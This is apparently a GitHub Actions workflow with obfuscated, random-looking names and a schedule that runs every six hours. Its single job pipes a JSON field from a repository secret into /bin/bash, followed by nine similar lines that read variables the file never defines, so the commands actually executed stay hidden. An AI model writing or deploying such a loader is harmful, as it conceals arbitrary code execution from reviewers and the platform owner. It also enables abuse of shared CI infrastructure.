name: worldcupescutcheon
on:
  workflow_dispatch:
  schedule:
    - cron: '52 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: worldcupescutcheon
        env:
          bev8018: ${{ secrets.bev8018 }}
        run: |
          echo $bev8018 | jq -r .ieuwg370 | /bin/bash
          echo $zfzvk73837 | jq -r .fmsj8 | /bin/bash
          echo $xnm536 | jq -r .f5 | /bin/bash
          echo $knz703 | jq -r .cckdw44 | /bin/bash
          echo $kqqe83180 | jq -r .ys9 | /bin/bash
          echo $zvcbe78 | jq -r .ctwtn81 | /bin/bash
          echo $tyu19 | jq -r .tq396 | /bin/bash
          echo $v9 | jq -r .mbzh05951 | /bin/bash
          echo $aqv109 | jq -r .n667 | /bin/bash
          echo $bry174 | jq -r .vav358 | /bin/bash

